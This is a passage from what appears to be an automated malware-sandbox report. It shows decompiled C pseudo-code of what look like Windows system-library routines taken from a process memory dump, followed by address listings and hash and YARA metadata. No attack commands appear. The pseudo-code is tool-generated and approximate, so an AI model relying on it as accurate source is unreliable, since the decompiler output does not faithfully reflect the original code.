										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04F07D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4ec5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04F1F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04F1F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04F67016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04F02400(_t267 + 0x20);
															}
															L04F02400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04F12397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04F02280(_t134, 0x4fd8608);
									__eflags =  *0x4fd6e48 - _t253; // 0x30041d0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04EFFFB0(_t198, _t241, 0x4fd8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4fd6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4fd8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04F16B90(_t210,  &_v64);
										_t262 =  *0x4fd8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04F1E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04F297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04F2006A(0x4fd8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4fd8608);
												E04F2B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4fd6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4fd6e48; // 0x30041d0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04EFFFB0(_t198, _t240, 0x4fd8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04F200C2(0x4fd8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                                                0x04f120a0
                                                                                                                                0x04f120a8
                                                                                                                                0x04f120ad
                                                                                                                                0x04f120b3
                                                                                                                                0x04f120b8
                                                                                                                                0x04f120c2
                                                                                                                                0x04f120c7
                                                                                                                                0x04f120cb
                                                                                                                                0x04f120d2
                                                                                                                                0x04f12263
                                                                                                                                0x04f12266
                                                                                                                                0x04f55836
                                                                                                                                0x04f55836
                                                                                                                                0x00000000
                                                                                                                                0x04f1226c
                                                                                                                                0x04f1226c
                                                                                                                                0x04f12270
                                                                                                                                0x04f12274
                                                                                                                                0x04f120e2
                                                                                                                                0x04f120e2
                                                                                                                                0x04f120e6
                                                                                                                                0x04f120ee
                                                                                                                                0x04f557dc
                                                                                                                                0x04f557de
                                                                                                                                0x04f557ec
                                                                                                                                0x04f557ec
                                                                                                                                0x04f557f1
                                                                                                                                0x04f557f3
                                                                                                                                0x04f557f8
                                                                                                                                0x00000000
                                                                                                                                0x04f557f8
                                                                                                                                0x04f557e0
                                                                                                                                0x04f557e4
                                                                                                                                0x04f557ea
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f557ea
                                                                                                                                0x04f120f4
                                                                                                                                0x04f120f4
                                                                                                                                0x04f120f8
                                                                                                                                0x04f120f8
                                                                                                                                0x04f120fc
                                                                                                                                0x04f12100
                                                                                                                                0x04f12106
                                                                                                                                0x04f12201
                                                                                                                                0x04f12206
                                                                                                                                0x04f1220b
                                                                                                                                0x04f1220e
                                                                                                                                0x04f122a9
                                                                                                                                0x04f122ac
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f122b2
                                                                                                                                0x04f122b5
                                                                                                                                0x04f55801
                                                                                                                                0x04f55806
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55810
                                                                                                                                0x04f55815
                                                                                                                                0x04f55818
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5581e
                                                                                                                                0x04f122bb
                                                                                                                                0x04f122bb
                                                                                                                                0x04f12218
                                                                                                                                0x04f12218
                                                                                                                                0x04f1221c
                                                                                                                                0x04f12220
                                                                                                                                0x04f12222
                                                                                                                                0x04f122c2
                                                                                                                                0x04f122c4
                                                                                                                                0x04f122dc
                                                                                                                                0x04f122dc
                                                                                                                                0x04f122e1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f122e7
                                                                                                                                0x04f122c8
                                                                                                                                0x04f122cd
                                                                                                                                0x04f122d3
                                                                                                                                0x04f122d6
                                                                                                                                0x04f55823
                                                                                                                                0x04f55825
                                                                                                                                0x04f55827
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5582d
                                                                                                                                0x00000000
                                                                                                                                0x04f5582d
                                                                                                                                0x00000000
                                                                                                                                0x04f12228
                                                                                                                                0x04f12228
                                                                                                                                0x00000000
                                                                                                                                0x04f12228
                                                                                                                                0x04f12222
                                                                                                                                0x04f12214
                                                                                                                                0x04f12214
                                                                                                                                0x00000000
                                                                                                                                0x04f12114
                                                                                                                                0x04f12114
                                                                                                                                0x04f12114
                                                                                                                                0x04f1211a
                                                                                                                                0x04f1211c
                                                                                                                                0x04f12348
                                                                                                                                0x04f1234d
                                                                                                                                0x04f55840
                                                                                                                                0x04f55845
                                                                                                                                0x04f55848
                                                                                                                                0x04f5584e
                                                                                                                                0x04f5584e
                                                                                                                                0x04f55848
                                                                                                                                0x04f12353
                                                                                                                                0x04f12355
                                                                                                                                0x04f12388
                                                                                                                                0x04f12388
                                                                                                                                0x04f12368
                                                                                                                                0x04f1236a
                                                                                                                                0x04f1236c
                                                                                                                                0x04f1238f
                                                                                                                                0x00000000
                                                                                                                                0x04f1236e
                                                                                                                                0x04f1236e
                                                                                                                                0x04f1218e
                                                                                                                                0x04f1218e
                                                                                                                                0x04f12191
                                                                                                                                0x04f12195
                                                                                                                                0x04f55a03
                                                                                                                                0x04f55a06
                                                                                                                                0x04f55a0c
                                                                                                                                0x04f55a0f
                                                                                                                                0x04f55a11
                                                                                                                                0x04f55a13
                                                                                                                                0x04f55a13
                                                                                                                                0x04f55a19
                                                                                                                                0x04f55a1f
                                                                                                                                0x00000000
                                                                                                                                0x04f1219b
                                                                                                                                0x04f1219b
                                                                                                                                0x04f121a0
                                                                                                                                0x04f12282
                                                                                                                                0x04f12284
                                                                                                                                0x04f12284
                                                                                                                                0x04f12284
                                                                                                                                0x04f12284
                                                                                                                                0x04f121a6
                                                                                                                                0x04f121a9
                                                                                                                                0x04f121ac
                                                                                                                                0x04f121ae
                                                                                                                                0x04f121b3
                                                                                                                                0x04f1228b
                                                                                                                                0x04f12290
                                                                                                                                0x04f12379
                                                                                                                                0x04f12296
                                                                                                                                0x04f12298
                                                                                                                                0x04f12298
                                                                                                                                0x04f12290
                                                                                                                                0x04f121b9
                                                                                                                                0x04f121be
                                                                                                                                0x04f122a2
                                                                                                                                0x04f122a2
                                                                                                                                0x04f121c4
                                                                                                                                0x04f121c8
                                                                                                                                0x04f121cc
                                                                                                                                0x04f121d0
                                                                                                                                0x04f121d4
                                                                                                                                0x04f121de
                                                                                                                                0x04f121e3
                                                                                                                                0x04f55a29
                                                                                                                                0x04f55a2c
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55a3b
                                                                                                                                0x00000000
                                                                                                                                0x04f121e9
                                                                                                                                0x04f121e9
                                                                                                                                0x04f121e9
                                                                                                                                0x04f121ee
                                                                                                                                0x04f121f1
                                                                                                                                0x04f55a45
                                                                                                                                0x04f55a4b
                                                                                                                                0x04f55a52
                                                                                                                                0x04f55a58
                                                                                                                                0x04f55a5d
                                                                                                                                0x04f55a5f
                                                                                                                                0x04f55a71
                                                                                                                                0x04f55a61
                                                                                                                                0x04f55a6a
                                                                                                                                0x04f55a6a
                                                                                                                                0x04f55a76
                                                                                                                                0x04f55a79
                                                                                                                                0x04f55a7f
                                                                                                                                0x04f55a83
                                                                                                                                0x04f55a85
                                                                                                                                0x04f55a87
                                                                                                                                0x04f55a87
                                                                                                                                0x04f55a8c
                                                                                                                                0x04f55a91
                                                                                                                                0x04f55a97
                                                                                                                                0x04f55a9f
                                                                                                                                0x04f55aa0
                                                                                                                                0x04f55aa1
                                                                                                                                0x04f55aa6
                                                                                                                                0x04f55aab
                                                                                                                                0x04f55ab1
                                                                                                                                0x04f55ab3
                                                                                                                                0x04f55ab9
                                                                                                                                0x04f55aca
                                                                                                                                0x04f55ad4
                                                                                                                                0x04f55ad4
                                                                                                                                0x04f55ade
                                                                                                                                0x04f55ade
                                                                                                                                0x04f55aab
                                                                                                                                0x04f55a79
                                                                                                                                0x04f55a52
                                                                                                                                0x04f121f7
                                                                                                                                0x04f121f9
                                                                                                                                0x04f121fe
                                                                                                                                0x04f121fe
                                                                                                                                0x04f121e3
                                                                                                                                0x04f12195
                                                                                                                                0x04f1236c
                                                                                                                                0x04f12122
                                                                                                                                0x04f12122
                                                                                                                                0x04f12124
                                                                                                                                0x04f12231
                                                                                                                                0x04f12236
                                                                                                                                0x04f12236
                                                                                                                                0x04f12238
                                                                                                                                0x04f12238
                                                                                                                                0x04f12240
                                                                                                                                0x04f12242
                                                                                                                                0x04f12244
                                                                                                                                0x04f559fc
                                                                                                                                0x04f1218c
                                                                                                                                0x04f1218c
                                                                                                                                0x00000000
                                                                                                                                0x04f1218c
                                                                                                                                0x04f1224a
                                                                                                                                0x04f1224f
                                                                                                                                0x04f12256
                                                                                                                                0x04f12304
                                                                                                                                0x04f12309
                                                                                                                                0x04f1230f
                                                                                                                                0x04f1231e
                                                                                                                                0x04f1231e
                                                                                                                                0x04f1231e
                                                                                                                                0x04f12320
                                                                                                                                0x04f12325
                                                                                                                                0x04f1232a
                                                                                                                                0x04f1232c
                                                                                                                                0x04f1233e
                                                                                                                                0x04f1233e
                                                                                                                                0x00000000
                                                                                                                                0x04f1232c
                                                                                                                                0x04f12311
                                                                                                                                0x04f12317
                                                                                                                                0x04f1231a
                                                                                                                                0x04f1231c
                                                                                                                                0x04f12380
                                                                                                                                0x04f12380
                                                                                                                                0x04f12380
                                                                                                                                0x04f12384
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f12386
                                                                                                                                0x00000000
                                                                                                                                0x04f1231c
                                                                                                                                0x04f1225c
                                                                                                                                0x04f1225c
                                                                                                                                0x00000000
                                                                                                                                0x04f1225c
                                                                                                                                0x04f1212a
                                                                                                                                0x04f12134
                                                                                                                                0x04f12138
                                                                                                                                0x04f1213d
                                                                                                                                0x04f55858
                                                                                                                                0x04f55863
                                                                                                                                0x04f55863
                                                                                                                                0x04f55867
                                                                                                                                0x04f5586a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5586c
                                                                                                                                0x04f5586c
                                                                                                                                0x04f55871
                                                                                                                                0x04f55875
                                                                                                                                0x04f55877
                                                                                                                                0x04f55997
                                                                                                                                0x04f5599c
                                                                                                                                0x04f559a1
                                                                                                                                0x04f559a7
                                                                                                                                0x04f559a7
                                                                                                                                0x00000000
                                                                                                                                0x04f559a7
                                                                                                                                0x04f5587d
                                                                                                                                0x00000000
                                                                                                                                0x04f5588b
                                                                                                                                0x04f5588b
                                                                                                                                0x04f55890
                                                                                                                                0x04f55892
                                                                                                                                0x04f55894
                                                                                                                                0x04f55899
                                                                                                                                0x04f5589b
                                                                                                                                0x04f558a0
                                                                                                                                0x04f558a0
                                                                                                                                0x04f558aa
                                                                                                                                0x04f558b2
                                                                                                                                0x04f558b6
                                                                                                                                0x04f558be
                                                                                                                                0x04f558c6
                                                                                                                                0x04f558c9
                                                                                                                                0x04f5590d
                                                                                                                                0x04f55917
                                                                                                                                0x04f5591a
                                                                                                                                0x04f5591c
                                                                                                                                0x04f55920
                                                                                                                                0x04f55928
                                                                                                                                0x04f5592a
                                                                                                                                0x04f5592c
                                                                                                                                0x04f5592e
                                                                                                                                0x04f5592e
                                                                                                                                0x04f558cb
                                                                                                                                0x04f558cd
                                                                                                                                0x04f558d8
                                                                                                                                0x04f558e0
                                                                                                                                0x04f558f4
                                                                                                                                0x04f558fe
                                                                                                                                0x04f558fe
                                                                                                                                0x04f5593a
                                                                                                                                0x04f5593e
                                                                                                                                0x04f55940
                                                                                                                                0x04f55942
                                                                                                                                0x00000000
                                                                                                                                0x04f55944
                                                                                                                                0x04f55944
                                                                                                                                0x04f55949
                                                                                                                                0x04f5594e
                                                                                                                                0x04f5594e
                                                                                                                                0x04f55953
                                                                                                                                0x04f5595b
                                                                                                                                0x04f55976
                                                                                                                                0x04f55976
                                                                                                                                0x04f5597a
                                                                                                                                0x04f5597f
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55981
                                                                                                                                0x04f55981
                                                                                                                                0x04f55981
                                                                                                                                0x04f55983
                                                                                                                                0x04f55988
                                                                                                                                0x04f5598d
                                                                                                                                0x04f55991
                                                                                                                                0x04f55991
                                                                                                                                0x00000000
                                                                                                                                0x04f5595d
                                                                                                                                0x04f5595d
                                                                                                                                0x04f55963
                                                                                                                                0x04f55965
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55967
                                                                                                                                0x04f55967
                                                                                                                                0x04f5596b
                                                                                                                                0x04f5596d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5596f
                                                                                                                                0x04f55971
                                                                                                                                0x04f55971
                                                                                                                                0x04f55974
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55974
                                                                                                                                0x00000000
                                                                                                                                0x04f55967
                                                                                                                                0x04f5595b
                                                                                                                                0x04f55942
                                                                                                                                0x04f55863
                                                                                                                                0x04f12143
                                                                                                                                0x04f12143
                                                                                                                                0x04f12149
                                                                                                                                0x04f1214f
                                                                                                                                0x04f122f1
                                                                                                                                0x04f122f6
                                                                                                                                0x00000000
                                                                                                                                0x04f12173
                                                                                                                                0x04f12173
                                                                                                                                0x04f1217d
                                                                                                                                0x04f12181
                                                                                                                                0x04f12186
                                                                                                                                0x04f559ae
                                                                                                                                0x04f559b2
                                                                                                                                0x04f559b5
                                                                                                                                0x04f559b7
                                                                                                                                0x04f559ba
                                                                                                                                0x04f559cd
                                                                                                                                0x04f559d1
                                                                                                                                0x04f559d5
                                                                                                                                0x04f559d9
                                                                                                                                0x04f559db
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f559dd
                                                                                                                                0x04f559dd
                                                                                                                                0x04f559e1
                                                                                                                                0x04f559e4
                                                                                                                                0x04f559e7
                                                                                                                                0x04f559ee
                                                                                                                                0x04f559ee
                                                                                                                                0x04f559f3
                                                                                                                                0x04f559f3
                                                                                                                                0x00000000
                                                                                                                                0x04f12186
                                                                                                                                0x04f1214f
                                                                                                                                0x04f12106
                                                                                                                                0x04f12266
                                                                                                                                0x04f120d8
                                                                                                                                0x04f120da
                                                                                                                                0x04f120e0
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 60cc7d6d55ed53204259b5cf9877b01b05b6bedd3854a0b41d52c3a417eb6c38
                                                                                                                                • Instruction ID: 2a9c1d8e8389c020a953fc0e226aa8b3ca86047cb6b1ecc3de5f86c97bd31f83
                                                                                                                                • Opcode Fuzzy Hash: 60cc7d6d55ed53204259b5cf9877b01b05b6bedd3854a0b41d52c3a417eb6c38
                                                                                                                                • Instruction Fuzzy Hash: DBF1F931A083419FE725CFA8C84076A77E2EF85364F05995DE995EB260D734F843CB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EFD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 87%
                                                                                                                                			E04EFD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4fdd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04EF6600(0x4fd52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4fd7b9c; // 0x0
							_t281 = L04F04620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04F2F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4fd7b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4fd7b8c; // 0x3001d40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04F02280(_t200, 0x4fd84d8);
									_t277 =  *0x4fd85f4; // 0x3002518
									_t351 =  *0x4fd85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x30024b0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04EFFFB0(_t287, _t353, 0x4fd84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04F3CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04EF6600(0x4fd52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04EF7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4fdb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04F6E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4fd8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4fdb218; // 0x0
														asm("ror edi, cl");
														 *0x4fdb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04F02280(_t250, 0x4fd84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04F23898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04EFFFB0(_t293, _t353, 0x4fd84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04F237F5(_t353, 0);
																}
																E04F20413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04F19B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
